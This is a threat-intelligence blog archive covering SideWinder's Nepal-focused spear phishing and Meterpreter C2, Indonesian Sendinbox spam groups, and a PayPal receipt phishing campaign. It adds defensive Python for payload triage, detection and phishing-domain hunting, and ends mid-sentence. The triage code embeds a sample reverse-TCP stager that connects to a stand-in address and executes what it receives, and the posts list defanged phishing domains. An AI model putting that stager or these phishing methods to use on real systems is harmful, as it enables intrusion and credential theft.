Monday, March 8, 2021

Renewed SideWinder Activity in South Asia

A few months ago, Trend Micro published a post summarizing the SideWinder APT group's activity over the past year, showcasing SideWinder's mobile malware development and its spear phishing campaigns against the government and military of Nepal, the government of Afghanistan, the state-owned Myanma Posts and Telecommunications, the Chinese Ministry of Foreign Affairs, and several other entities.

The SideWinder APT, also tracked as RAZOR TIGER, APT-C-17, and Rattlesnake, has picked its targets in South Asia across multiple previous campaigns [1, 2, 3]. Its targets have mainly been in Nepal, Pakistan, Afghanistan, and China, along with a few other countries from the group's known past activity. The group is generally believed to be aligned with Indian interests and mainly targets government and military entities in its espionage operations.

While hunting through world scan data provided by BinaryEdge, we came across a server hosting an executable file. Following that lead uncovered a renewed set of SideWinder activity, picking up right where the group left off in its previous year of operation.

Key Findings:
  • The group renewed its spear phishing activity with new domains registered targeting government entities in Nepal.
  • Nepal recently cancelled its upcoming elections scheduled for 30 April and 10 May 2021.
  • Uncovered evidence of the group likely targeting Nepal's Election Commission.
  • Evidence of continued efforts of malware development being conducted by the group.

Command and Control

The server that was the starting point of our investigation returned the following shellcode in its scan response on port 8087.

Server's raw response showing an expected C2 domain connection.

Dumping this raw data for initial triage, we concluded it was most likely 2nd stage malware using this server for command and control.

PE-Studio showing us the malware's used libraries, headers, references, and compilation date.

As we continued searching the server, we found it was also communicating with what looked to be 1st stage malware over port 8085. We believe this 1st stage malware is used in SideWinder's spear phishing attacks, and we suspect a sample of it was uploaded to VirusTotal in January.
On further searching we found the 2nd stage payload itself, hosted on this server as a plain text file encoded in Base64. A straightforward decode revealed the code the threat actor is using for the 2nd stage payload.
Meterpreter 2nd Stage Payload code excerpt.

This confirmed our assumption: the server is used for command and control with a Meterpreter-based payload written in Python.
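To make the triage described above repeatable, here is an added Python example (not code from the post or from the actor) that decodes a hosted Base64 text file, fingerprints the result by magic bytes, pulls out embedded connect() targets and URLs, and flags markers typical of a Python Meterpreter-style reverse TCP stager (a length-prefixed read from the socket followed by exec). The embedded sample payload and its TEST-NET address are constructed for the example; the actor's real payload is not reproduced here.

```python
import base64
import hashlib
import re

# Constructed sample: a Base64 text file of the kind found hosted on the server,
# wrapping a short Python reverse-TCP stager in the style of Metasploit's
# python/meterpreter stager. 203.0.113.10 is a TEST-NET address; this is NOT the
# actor's payload, only a stand-in so the example runs offline.
_SAMPLE_PAYLOAD = (
    b"import socket,struct\n"
    b"s=socket.socket(2,1)\n"
    b"s.connect(('203.0.113.10',8087))\n"
    b"l=struct.unpack('>I',s.recv(4))[0]\n"
    b"d=s.recv(l)\n"
    b"while len(d)<l:\n"
    b"\td+=s.recv(l-len(d))\n"
    b"exec(d,{'s':s})\n"
)
_B64 = base64.b64encode(_SAMPLE_PAYLOAD).decode("ascii")
# Hosted .txt files are often line-wrapped; wrap at 60 characters to mimic that.
SAMPLE_STAGED_TEXT = "\n".join(_B64[i:i + 60] for i in range(0, len(_B64), 60))

# Markers typical of the Python Meterpreter stager: a 4-byte big-endian length
# prefix read off the socket, then the received stage handed to exec().
STAGER_MARKERS = (b"struct.unpack('>I'", b"exec(", b"socket.socket(")

IPV4_RE = re.compile(rb"\b(?:\d{1,3}\.){3}\d{1,3}\b")
URL_RE = re.compile(rb"https?://[^\s'\"<>]+")
# ('host', port) tuples as passed to socket.connect()
CONNECT_RE = re.compile(rb"\(\s*['\"]([^'\"]+)['\"]\s*,\s*(\d{1,5})\s*\)")


def decode_staged(text: str) -> bytes:
    """Decode Base64 that may be line-wrapped, space-padded, or missing '=' padding."""
    compact = re.sub(rb"\s+", b"", text.encode("ascii", "ignore"))
    compact += b"=" * (-len(compact) % 4)
    return base64.b64decode(compact, validate=True)


def identify(blob: bytes) -> str:
    """Cheap file-type fingerprint from magic bytes, with a Python-source heuristic."""
    if blob[:2] == b"MZ":
        return "PE"
    if blob[:4] == b"\x7fELF":
        return "ELF"
    if blob[:2] == b"PK":
        return "ZIP"
    try:
        src = blob.decode("utf-8")
    except UnicodeDecodeError:
        return "unknown"
    if re.search(r"^\s*(import|from)\s+\w", src, re.M):
        return "python-source"
    return "text"


def stager_markers(blob: bytes) -> list:
    return [m.decode() for m in STAGER_MARKERS if m in blob]


def extract_iocs(blob: bytes) -> dict:
    """Network indicators worth pivoting on: IPv4 literals, URLs, connect() endpoints."""
    return {
        "ipv4": sorted({m.decode() for m in IPV4_RE.findall(blob)}),
        "urls": sorted({m.decode("utf-8", "replace") for m in URL_RE.findall(blob)}),
        "endpoints": sorted({f"{h.decode('utf-8', 'replace')}:{p.decode()}"
                             for h, p in CONNECT_RE.findall(blob)}),
    }


def triage(text: str) -> dict:
    blob = decode_staged(text)
    return {
        "sha256": hashlib.sha256(blob).hexdigest(),
        "size": len(blob),
        "kind": identify(blob),
        "stager_markers": stager_markers(blob),
        "iocs": extract_iocs(blob),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_STAGED_TEXT), indent=2))
```

Feed it the raw text pulled from the server; the hash gives you a pivot for VirusTotal, the endpoints give you the C2 to block, and the marker list tells you whether this is a stager that will pull a larger stage over the same socket (the case described here) rather than the full payload.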

First Stage Payload

An example of what we suspect this group is using that precedes the command and control infrastructure we first laid eyes on was this malware file uploaded to VirusTotal:

An .hta file most likely attached to spear phishing emails.

We suspect this actor is using malicious .hta attachments that contain links to decoy document lures along with the embedded 1st stage malware. Here we see such an embedded link to a PE file disguised as a .txt file, used to deploy spyware upon execution.

Once downloaded, the spyware checks the environment it is running in and identifies the infected machine's public IP address with an external HTTP request.

External request to an online IP check API.

This is another Python-based malware. The sample runs in the background after execution, builds a database file of logins extracted from browser files, and archives the infected machine's Downloads, Documents, and Desktop folders ahead of exfiltration.
Utilizing the WriteFile function to write the stolen data to files.
Immediately after execution the malware starts collecting files, writing the stolen browser data to a "Loginvault.db" file and packing the folders into .zip files named after the folder location, the machine's IP address, and a datestamp.

Exfiltration attempt to the C2 server using port 8080.
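As an added example of turning these behaviours into detection logic (not part of the original post), the following Python correlates constructed endpoint telemetry: a process that writes Loginvault.db or a .zip whose name embeds an IPv4 address, and then connects out to one of the ports seen on this server (8080, 8085, 8087) within a short window, is raised as an alert. The event schema, the process names and the exact archive naming pattern ("<folder>_<ip>_<date>.zip") are assumptions for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Ports the post associates with this server: 8080 (exfiltration), 8085 and 8087 (staging/C2).
SUSPECT_PORTS = {8080, 8085, 8087}
WINDOW = timedelta(minutes=5)
IPV4_RE = re.compile(r"(?:\d{1,3}\.){3}\d{1,3}")

# Constructed telemetry in a simplified (timestamp, pid, image, event, detail) shape,
# not a real Sysmon or EDR export. The archive names assume "<folder>_<ip>_<date>.zip",
# one reading of the naming scheme described above. All addresses are TEST-NET/RFC1918.
SAMPLE_EVENTS = [
    ("2021-02-20T09:14:02", 4120, r"C:\Users\alice\Downloads\Report.txt.exe", "file_create",
     r"C:\Users\alice\AppData\Local\Temp\Loginvault.db"),
    ("2021-02-20T09:14:05", 4120, r"C:\Users\alice\Downloads\Report.txt.exe", "file_create",
     r"C:\Users\alice\AppData\Local\Temp\Documents_203.0.113.10_20210220.zip"),
    ("2021-02-20T09:14:06", 4120, r"C:\Users\alice\Downloads\Report.txt.exe", "file_create",
     r"C:\Users\alice\AppData\Local\Temp\Desktop_203.0.113.10_20210220.zip"),
    ("2021-02-20T09:14:40", 4120, r"C:\Users\alice\Downloads\Report.txt.exe", "net_connect",
     "198.51.100.7:8080"),
    # Benign: a backup agent zips Documents (no IP in the name) and talks to an internal host on 443.
    ("2021-02-20T09:20:00", 5012, r"C:\Program Files\Backup\backup.exe", "file_create",
     r"D:\Backups\Documents_20210220.zip"),
    ("2021-02-20T09:20:30", 5012, r"C:\Program Files\Backup\backup.exe", "net_connect",
     "10.0.0.5:443"),
    # Benign: the browser itself touches its own login database, then talks to the web on 443.
    ("2021-02-20T09:21:00", 6100, r"C:\Program Files\Google\Chrome\Application\chrome.exe", "file_create",
     r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    ("2021-02-20T09:21:01", 6100, r"C:\Program Files\Google\Chrome\Application\chrome.exe", "net_connect",
     "203.0.113.50:443"),
]


def is_staging_file(path: str) -> bool:
    """Loginvault.db, or a .zip whose file name carries an IPv4 address."""
    name = path.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return name == "loginvault.db" or (name.endswith(".zip") and IPV4_RE.search(name) is not None)


def correlate(events, window=WINDOW, ports=SUSPECT_PORTS) -> list:
    """Alert when a process stages files and then connects out to a suspect port within `window`."""
    staged = defaultdict(list)          # pid -> [(timestamp, path), ...]
    alerts = []
    for ts_s, pid, image, kind, detail in sorted(events):
        ts = datetime.fromisoformat(ts_s)
        if kind == "file_create" and is_staging_file(detail):
            staged[pid].append((ts, detail))
        elif kind == "net_connect":
            _, port = detail.rsplit(":", 1)
            if int(port) not in ports:
                continue
            recent = [p for t, p in staged[pid] if ts - t <= window]
            if recent:
                alerts.append({"pid": pid, "image": image, "remote": detail, "staged_files": recent})
    return alerts


if __name__ == "__main__":
    for a in correlate(SAMPLE_EVENTS):
        print(f"[ALERT] pid={a['pid']} {a['image']} -> {a['remote']}")
        for f in a["staged_files"]:
            print("   staged:", f)
```

The correlation keys on the process, not on the file names alone, so a backup agent zipping the same folders or a browser touching its own login store do not fire; the suspect-port list is only the set observed on this server and should be widened with your own egress baseline.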

This spyware sample leads directly into the spear phishing efforts we suspect SideWinder is conducting with similar malware techniques.

Spear Phishing

While going through the contents and configuration of this server we also found the decoy pages SideWinder uses to phish its intended targets. To our surprise, the server turned out to be a single staging point for much of the group's phishing activity (on top of some mobile malware development efforts we cover further along in the post).

The server used various dynamic DNS names resolving to its main IP address, and almost all of the domain names mimic the naming conventions of the real entities SideWinder is targeting.

SideWinder remains focused on the same entities it previously attempted to target, as showcased in Trend Micro's report, while adding some additional in-country organizations to its target list.

Over the last few weeks the group appears to have renewed its activity and started ramping up efforts against its targets of choice. Through our investigation of the server, for example, we found the group renewing its efforts against government entities of Nepal and setting up phishing infrastructure to launch such campaigns.

SideWinder appears to have added the Ministry of Physical Infrastructure and Transport of Nepal to its list of targets, and is still actively trying to gain access to other government offices of the country.

Ministry of Physical Infrastructure and Transport of Nepal domain and login panel.

Another target in Nepal is the Ministry of Foreign Affairs, where a preceding lure is meant to motivate the recipient to log in with their credentials in order to continue reading the decoy article planted by the threat actor. In this case the article is a press release by the Nepal Mission to the UN about the COVID-19 situation in the region and human rights issues.

Ministry of Foreign Affairs decoy lure.

A short while after accessing the link the unsuspecting reader will be redirected to the Ministry’s login page.

After a redirect from the lure article, the reader is redirected to this login panel.

Here CapTipper shows the roughly 15 seconds it takes to get redirected from the initial decoy article to the login panel.

The phishing pages in this activity rely on the real target website's content delivery backbone: the page's media is loaded from the legitimate site, and the victim is redirected to it once credentials are entered. The actor-controlled server therefore only hosts basic phishing kits that use the target's own content delivery network to mimic the login panel. A side effect is that, unless the kit strips the Referer header, the legitimate site's access logs will show its static assets being requested from the phishing domain, a signal the targeted organization can watch for.

The fake page making lookup requests to the real Nepal Foreign Affairs government website.
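Because the kits load their media from the legitimate site, the targeted organization's own web server logs carry a signal: static assets requested with a Referer on a domain the organization does not own. The Python below is an added example, not part of the post, that parses combined-format access logs and counts such requests per foreign referer host, then singles out referers that reuse the organization's own name. The hostnames and log lines are constructed, and a kit that sets a no-referrer policy would not show up this way. The same check applies to the Election Commission page described further down.

```python
import re
from collections import Counter
from urllib.parse import urlsplit

# Hostnames the organisation serves itself; requests from any other referer are hotlinks.
# Constructed placeholders, not the ministry's real hostnames.
OWN_HOSTS = {"www.ministry.example", "ministry.example", "mail.ministry.example"}
STATIC_EXTS = (".css", ".js", ".png", ".jpg", ".jpeg", ".gif", ".svg", ".woff", ".woff2", ".ico")

# Apache / nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed access-log lines. The look-alike referer host is invented for the example.
SAMPLE_LOG = """\
203.0.113.5 - - [02/Mar/2021:10:01:12 +0545] "GET /assets/site.css HTTP/1.1" 200 8120 "https://www.ministry.example/" "Mozilla/5.0"
203.0.113.5 - - [02/Mar/2021:10:01:13 +0545] "GET /assets/logo.png HTTP/1.1" 200 4410 "-" "Mozilla/5.0"
198.51.100.23 - - [02/Mar/2021:10:02:40 +0545] "GET /assets/site.css HTTP/1.1" 200 8120 "https://mail.ministry-login.example/webmail/" "Mozilla/5.0"
198.51.100.23 - - [02/Mar/2021:10:02:40 +0545] "GET /assets/app.js HTTP/1.1" 200 22310 "https://mail.ministry-login.example/webmail/" "Mozilla/5.0"
198.51.100.23 - - [02/Mar/2021:10:02:41 +0545] "GET /assets/logo.png HTTP/1.1" 200 4410 "https://mail.ministry-login.example/webmail/" "Mozilla/5.0"
198.51.100.77 - - [02/Mar/2021:10:05:00 +0545] "GET /news/press-release HTTP/1.1" 200 15100 "https://www.google.com/" "Mozilla/5.0"
"""


def parse_line(line: str):
    """Return the combined-log fields as a dict, or None for lines that do not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def is_static(path: str) -> bool:
    return path.split("?", 1)[0].lower().endswith(STATIC_EXTS)


def find_hotlinkers(lines, own_hosts=OWN_HOSTS) -> dict:
    """Count static-asset requests per Referer host that is not one of our own."""
    counts = Counter()
    for line in lines:
        rec = parse_line(line)
        if not rec or not is_static(rec["path"]):
            continue
        ref_host = (urlsplit(rec["referer"]).hostname or "").lower()
        if not ref_host or ref_host in own_hosts:   # "-" (no referer) or our own pages
            continue
        counts[ref_host] += 1
    return dict(counts)


def brand_mimics(hotlinkers: dict, tokens=("ministry",)) -> list:
    """Foreign referers whose hostname reuses one of our own name tokens: the likely phishing kits."""
    return sorted(h for h in hotlinkers if any(t in h for t in tokens))


if __name__ == "__main__":
    hot = find_hotlinkers(SAMPLE_LOG.splitlines())
    for host, n in sorted(hot.items(), key=lambda kv: -kv[1]):
        print(f"{n:5d}  {host}")
    print("name-mimicking referers:", brand_mimics(hot))
```

Run it over a day of logs and the phishing domain surfaces as a foreign referer pulling exactly the CSS, scripts and logo of the login page; the brand-token filter is what separates it from ordinary hotlinking by news aggregators or search previews.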

Some other decoy tricks the group employs in this campaign are error messages hardcoded into the phishing pages, such as this one in a page spoofing the Nepal central government email system:

Source code showing the hardcoded error message.

Or an additional one hardcoded in the phishing page targeting the Ministry of Defense:

Ministry of Defense login panel with a hardcoded error.

We take this to be a social engineering tactic: a pre-filled error gives the victim a pretext to re-enter their login credentials and complete the action.

We have also seen renewed efforts against organizations such as the state-owned Nepal Telecom, again using the real website's content backbone, including its reCAPTCHA widget.

Nepal Telecom phishing page piggybacking the reCaptcha widget.

As you can see, the SideWinder group is still very interested in targeting entities located in Nepal. In addition, we found a particularly interesting phishing page hosted on this server that points to what we believe is a new and current target focus for the group.

This new phishing target seems to be the Election Commission of Nepal:

A phishing page targeting the Election Commission of Nepal

As we've shown previously, the actor is again utilizing the same tactic of loading the content from the real government website and redirecting to it once credentials are entered:

This finding is particularly interesting given that Nepal had elections fast approaching in April and May of this year, which were overturned only last week.

Considering that these elections were only announced at the end of December 2020, we think this points to some of the motivation behind the group's renewed activity and new target focus over the past couple of months.


There were a few other findings from this server that we decided not to cover in this post, as they did not seem much different from the phase of operations this group was in at the end of last year. Some relate to the mobile malware applications SideWinder is developing; this part of its operations still appears to be very much in the development and testing stage, as evident from what looks like internal testing left behind by the developers.

Log left behind by the group.

We also cannot confirm that all of the phishing infrastructure we uncovered will deliver malware or be preceded by a malicious payload once in use. Even with the phishing pages residing on the same server as other malware, this remains unclear at this stage; some of these pages may very well be used in single-purpose credential phishing campaigns.

On the other hand, what we did cover in this post shows how focused SideWinder is on espionage operations against its area of interest in South Asia. Taking into account what this group has done in the past year, we should treat this renewed activity as an indication that SideWinder will only continue to ramp up its operations in the remaining months of 2021 and beyond.

The group's continued interest in Nepal is evidence of that. We can only speculate that regional developments such as potential elections in countries of the region, geopolitical tensions such as the military clashes on the India-China border, international events mixed with regional efforts such as COVID-19 vaccine distribution, and other regional interests will continue to fuel such campaigns in South Asia. We should anticipate more of this spear phishing activity, along with further development of the group's malware and especially its mobile malware capabilities, against its targets of interest.

Indicators of Compromise





Wednesday, September 5, 2018

Indonesian Spam Communities

In our last post we tried to shed some light on what at first glance seemed to be a very common PayPal phishing email, but turned out to be connected to a much larger and more unusual campaign the deeper we looked. By investigating that single email, we discovered a wide-ranging spam group originating from Indonesia that appeared responsible for the phishing activity we originally saw. Through that seemingly ordinary PayPal phishing email, we found that an Indonesian group was targeting the customer bases of various well-known companies by mass-sending phishing emails via uniquely identifiable Twitter-shortened URL redirections.

They have done so with great success, as we demonstrated by showing you some of the attacker’s self-shared screenshots of incoming victim credit card information. And we last left off by identifying some additional Twitter handles spreading phishing links and hunting some more connected infrastructure to that specific campaign.

Since our last update we have continued to monitor this group's activity, passing our findings along to the relevant parties. In the process we also discovered a second Indonesian spamming community alongside the SlackerC0de and Spammer ID groups identified in our previous post. This second group uses a slightly different set of tools and techniques, but stays true to the same core of collective financial scamming we wrote about previously.

While watching what the Spammer ID members were doing in their group, we saw them begin discussing an additional mailing tool called "Sendinbox". Up to that point they had mainly shared their use of mailers like "heart sender" and "GX40 sender". We had also seen the Spammer ID group try XAMPP with sendmail from their localhost, relaying through SlackerC0de infrastructure, alongside the web-based tools made available on their group websites such as tool[.]slackerc0de[.]us.

When we looked at what "Sendinbox" was, we found a PHP tool built on the popular PHPMailer library. Going through the group's chat, we saw them discuss setting this tool up on their shared group servers, mainly using Apple and PayPal phishing letters as the payload.

As the screenshots above show, the "Sendinbox" tool lets the attacker send a batch of emails at once with a preconfigured scam message through mail relay servers. In this example an attacker is testing whether his emails land in the regular inbox or are filtered as spam, using his own Yahoo account. We kept seeing this kind of "QA" process each time the attackers changed servers.

BMarket ID
"Sendinbox" is made by an "Eka Syahwan", who runs a community separate from Spammer ID across various social platforms. Its main purpose is to provide support to the user base that bought his mailer tool; a happy customer brings in more potential buyers. The community's main website, Bmarket[.]or[.]id, also hosts a relay server for email campaigns at hxxp://bmarket[.]or[.]id/sendinbox-server[.]php

A close-knit user base like this gives the would-be scammer support for his phishing campaigns, while the tool creator provides updates and workarounds for service blocks. These workarounds piled up the more we read of their group correspondence: members complained that the provided email servers were not delivering their scams or that the mail was landing in spam folders. We then saw a heavy shift from recognized servers like bmarket[.]or[.]id to members actively looking for compromised servers to relay their emails.
Group members such as the one above started looking for compromised servers on which to upload their Sendinbox tool for future campaigns, and shared them with the group. Once they had a foothold on a compromised website, they uploaded the SendInbox email tool, as seen below.
Other members also shared their use of vulnerability scanning tools to hunt for potential servers in the group chat.
Along with the proactive hunting these group members were conducting, they were monitoring another website belonging to the "Sendinbox" tool creator called IndoXploit which listed additional compromised servers for them to use in their phishing campaigns.

Eka Syahwan even lists this fact on his personal Facebook profile, along with regular updates on his scamming activity, as seen in his most recent warning post about some rippers who recently tried to do business with him on Telegram:

Since this is a smaller community that tends to share its successes and failures a little more openly than Spammer ID, it was easier for us to track what they were doing in their campaigns. And this group was definitely busy: we saw them successfully harvest many credit card records via targeted email lists, ranging from alphabetically ordered email lists to addresses from specific sectors like large educational institutions in the US.
An email list an attacker has prepared to massively spam his phishing letters. This list is alphabetically ordered Yahoo accounts which were already validated as Apple users. 
We saw this group target specific sectors or user bases, as in the example below of Japanese users of the IT provider SoftBank Japan:
The group is also sophisticated enough to socially engineer letters appropriate for a geographic and linguistic group like these Japanese Apple users. We saw them testing various Japanese templates, checking how they were received in a Japanese Yahoo mailbox, and bouncing off Japanese accounts where possible.

Successfully harvested credentials received in an attacker's email.

We only were able to look at the shared incoming credentials in the group chats, which amounted to hundreds of victims by our count. If we were to combine the credentials which weren't being shared it probably would make the true number of their victims much higher than that. 

Traditional phishing hunting tends to rely on certificate and brand-name watching. This is usually quite effective, since phishing domains rarely live longer than a day or two, and if a page slips past the hunters it is usually reported as fake by wary users.
The threat posed by closed scamming communities such as BMarket is that they crowdsource their setbacks and problems. A lone scammer might quit after an unsuccessful attempt, but a strong base of experienced users, and in this case a tool creator looking to satisfy his clients, will immediately fix whatever is broken or detected by phishing-domain watchers. The community also offers some confidentiality: a small group is harder to track when it makes little noise beyond its chat platforms. While some of their phishing domains are quickly identified, we saw that many Apple and PayPal customers still fell victim to the ploy, which we also attribute to the group's heavy use of shortened and redirected links.
In the grander scheme of the cybercrime landscape, passive hunting alone may not be enough; actively tracking and infiltrating cybercrime groups is needed to mitigate some parts of phishing activity such as this.


Twitter handles connected to this group:

Phishing Domains:


Used Mailing Infrastructure:





Compromised Websites Shared By the Group:
*Currently unconfirmed if being used by the group.

Friday, July 20, 2018

Uncovering A PayPal Phishing Campaign

While browsing the DC9723 group, we stumbled on a screenshot that one of the group's members had just shared with the rest of the DefCon group. The member had received what he described as a PayPal phishing email on the previous day (July 14th), containing a fake receipt for a purchase he had never made from an alleged Italian internet hosting company.

When we looked into this "Aruba IT" company, we saw that it is in fact a legitimate internet hosting and domain registration company based in Italy. That raised our curiosity to look further into the email itself and see whether anything else could be recovered that points to clues about this campaign, who else might be used as a front, and whether we could identify any related malicious activity.

The screenshot shared by the DC9723 user.
Fake Receipt Phishing

By using a fake receipt like this, the attacker wants to alarm the recipient into believing that a substantial purchase was just made in their name, hoping such a message will prompt action where a more traditional phishing email might not.
The attacker in this case copied PayPal's main electronic receipt template, aiming to scare the recipient into logging into the "PayPal" site and giving away their credentials.
Conveniently, as seen in the screenshot above, a line that is not present in a real PayPal receipt had been added: "You don't recognize this transaction?", with an embedded link that can be seen at the bottom of the email.

In all probability this was added to guide the target along the attacker's desired path of action, and it serves as a correlated pretext to resolve the supposed receipt misunderstanding.
On closer inspection the email also contains some spelling mistakes and mistyped numbers. These may be intentional, to add confusion to the dire financial situation the target believes they are in and a further sense of urgency to resolve it; more likely, the template was simply reassembled in haste.

The reply addresses stand out as obvious spoofs.

pavpal[.]com had been seen in old phishing activity and has since been registered by PayPal itself, probably in an effort to block this type of abuse.
paypai[.]com has also been observed in numerous scamming attempts and phishing campaigns, with its domain registered through Moniker Online Services.
Both are widely reported. This makes it very hard to conclude whether this attacker actually has current control of these mailboxes.

The embedded link to the fake PayPal resolution center this attacker chose to use was based on Twitter's link shortener:
  • t[.]co/Tv5Zo3ig7v
Taking a peek at the link and looking at its redirect chain:

We can identify that the actual target domain was paypa[.]com-verifyseeds[.]support
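Walking a shortener chain hop by hop, without letting the client follow redirects on its own, is how the target domain above is recovered. The following Python is an added example (not the post's tooling): follow_chain() records every hop, resolves relative Location headers, stops on loops or a hop limit, and reports which hops are known shorteners. http_fetch() is a live single-request fetcher for authorized use; the offline run uses a constructed lookup table that stands in for the network. Redirects performed in HTML or JavaScript (meta refresh, timed script redirects) come back as 200 and need a browser-driven tool such as CapTipper instead.

```python
import urllib.error
import urllib.request
from urllib.parse import urljoin, urlsplit

REDIRECT_CODES = {301, 302, 303, 307, 308}
# Shortener / redirector hosts seen in the chains listed above.
KNOWN_SHORTENERS = {"t.co", "huit.re", "xt.lv", "ok.ru"}


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Make urllib report each 3xx instead of silently following it."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def http_fetch(url: str, timeout: float = 10.0):
    """Live fetcher: one HEAD request, no following. Returns (status, Location or None).
    Only point this at infrastructure you are authorised to probe."""
    opener = urllib.request.build_opener(_NoRedirect)
    req = urllib.request.Request(url, method="HEAD")
    try:
        with opener.open(req, timeout=timeout) as resp:
            return resp.status, resp.headers.get("Location")
    except urllib.error.HTTPError as err:      # 3xx (because of _NoRedirect) and 4xx/5xx land here
        return err.code, err.headers.get("Location")


def follow_chain(url: str, fetch=http_fetch, max_hops: int = 10) -> dict:
    """Walk redirects hop by hop; stop when a page lands, a loop is seen, or max_hops is hit."""
    hops, seen = [url], {url}
    status = None
    for _ in range(max_hops):
        status, location = fetch(hops[-1])
        if status not in REDIRECT_CODES or not location:
            return {"hops": hops, "final": hops[-1], "status": status, "stopped": "landed"}
        nxt = urljoin(hops[-1], location)          # Location may be relative
        if nxt in seen:
            return {"hops": hops + [nxt], "final": nxt, "status": status, "stopped": "loop"}
        seen.add(nxt)
        hops.append(nxt)
    return {"hops": hops, "final": hops[-1], "status": status, "stopped": "max_hops"}


def hop_hosts(result: dict) -> list:
    return [(urlsplit(h).hostname or "").lower() for h in result["hops"]]


def shortener_hops(result: dict) -> list:
    return [h for h in hop_hosts(result) if h in KNOWN_SHORTENERS]


# Constructed offline stand-in for the network: a lookup table shaped like the chain
# in the post (shortener -> second shortener -> kit). Nothing here is fetched.
FAKE_CHAIN = {
    "https://t.co/Tv5Zo3ig7v": (301, "https://huit.re/shrt"),
    "https://huit.re/shrt": (302, "http://www.paypa.com-verifyseeds.support/stylec0de/"),
    "http://www.paypa.com-verifyseeds.support/stylec0de/": (200, None),
}


def fake_fetch(url: str):
    return FAKE_CHAIN.get(url, (404, None))


if __name__ == "__main__":
    r = follow_chain("https://t.co/Tv5Zo3ig7v", fetch=fake_fetch)
    for i, h in enumerate(r["hops"]):
        print(f"hop {i}: {h}")
    print("final:", r["final"], "| stopped:", r["stopped"], "| shorteners:", shortener_hops(r))
```

Swap fake_fetch for http_fetch to run it live; the hop list is what you submit to the shortener's abuse desk, and the final host is what goes into the brand-watching checks.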

By searching for similar pages based on the resource path we could identify similar domains being used in the past two weeks:
  • paypal[.]com-webapps[.]site
  • paypal[.]com-webappsinfo[.]reviews
  • paypa[.]com.lakukerascok[.]com
  • paypal[.]com-accountverify[.]support
  • paypal.accountinfoverify[.]support
  • paypa[.]com-verifyseeds[.]support
  • paypal[.]com-verifyaccount[.]center/ 
  • paypal[.]com-accountservice[.]info
Along with the following redirects:
  • t[.]co-d3gbfd[.]city
  • huit[.]re/tettew
  • huit[.]re/shrt
  • huit[.]re/_Ebfo0oe
  • xt[.]lv/XJiEa
  • alif[.]idseedapp[.]in
  • huit[.]re/webappss
  • kuntulmaju[.]ml/cuk 
  • huit[.]re/satumilyar
  • 1.googleincsafe[.]org/brinjilan
  • https://ok[.]ru/dk?cmd=logExternal&st.cmd=logExternal&
  • https://ok[.]ru/dk?cmd=logExternal&st.cmd=logExternal&
These varied redirects made us suspect that a phishing kit was being used and spread during these couple of weeks.
The domain that is currently still live and being used through the redirection chain is:

Which can be seen redirecting us to
www.paypa[.]com-verifyseeds[.]support - the redirection domain from our screenshot
And www.paypa[.]com.lakukerascok[.]com

Since the email was reported to PayPal immediately, we can see how effective redirection chains are at extending the lifespan of phishing scams.
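The domains listed above share a few recognisable tricks: the brand as a subdomain of an unrelated registrable domain, a "com-" label glued to the brand, and one-character typos like paypai and pavpal. The Python below is an added example of the brand-name watching mentioned in the Indonesian Spam Communities post above, not tooling from either post: it scores candidate hostnames against a brand list and explains each hit. The candidate list mixes domains from this post (written plainly so the code runs; nothing is resolved) with benign controls, and the last-two-labels rule for the registrable domain is a simplification that production code should replace with the Public Suffix List.

```python
# Brand -> official registrable domains (assumption list for the example).
BRANDS = {"paypal": {"paypal.com"}, "apple": {"apple.com"}, "icloud": {"icloud.com"}}

# Candidates: look-alikes from this post plus benign controls. Nothing is resolved or fetched.
CANDIDATES = [
    "paypal.com", "www.paypal.com", "example.com",
    "paypal.com-webapps.site", "paypal.com-accountverify.support",
    "paypal.accountinfoverify.support", "paypa.com.lakukerascok.com",
    "paypai.com", "pavpal.com", "app-recoveryicloud.com",
]


def levenshtein(a: str, b: str) -> int:
    """Plain edit distance; one edit from a brand label is the classic typosquat."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable(host: str) -> str:
    """Last two labels. A simplification; real tooling should use the Public Suffix List."""
    return ".".join(host.split(".")[-2:])


def lookalike_reasons(host: str, brands=BRANDS) -> list:
    """Return the reasons a hostname looks like a brand impersonation (empty if none)."""
    host = host.lower().strip(".")
    labels = host.split(".")
    reg = registrable(host)
    reasons = []
    for brand, official in brands.items():
        if reg in official:
            continue                                            # the real site or its subdomain
        for lbl in labels:
            if lbl == brand:
                reasons.append(f"brand-label:{brand}")          # paypal.<something>.support
            elif brand in lbl:
                reasons.append(f"brand-in-label:{brand}")       # app-recoveryicloud.com
            elif len(lbl) >= 4 and levenshtein(lbl, brand) == 1:
                reasons.append(f"typosquat:{brand}")            # paypai, pavpal, paypa
    if any(lbl.startswith("com-") for lbl in labels):
        reasons.append("com-dash")                              # paypal.com-webapps.site
    return reasons


def scan(hosts, brands=BRANDS) -> dict:
    """Map each flagged hostname to its list of reasons."""
    flagged = {}
    for h in hosts:
        reasons = lookalike_reasons(h, brands)
        if reasons:
            flagged[h] = reasons
    return flagged


if __name__ == "__main__":
    for host, reasons in scan(CANDIDATES).items():
        print(f"{host:40s} {', '.join(reasons)}")
```

Pointed at a certificate-transparency feed or new-registration list, the same function gives the first-day signal the post says phishing domains rarely survive past; the reasons list is what lets an analyst triage a hit without opening the page.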
Both of these websites are hosted on the same Google server - 142.4.14[.]169
Along with a now empty Apache server:

All pointing to the same styled ‘/stylec0de’ path like the following full URI path example:


The redirection path utilizes PayPal's own authentication API backbone to piggyback on what looks like legitimate PayPal correspondence.
A victim looking to quickly resolve a financial issue might not go over the very long link, and miss the spoofed URL at the end of it - giving away his credentials to the attacker. By using a malicious iframe like this, a sophisticated campaign can be achieved relying on a victim’s

Source code.

Screenshot of the Spoofed login page.
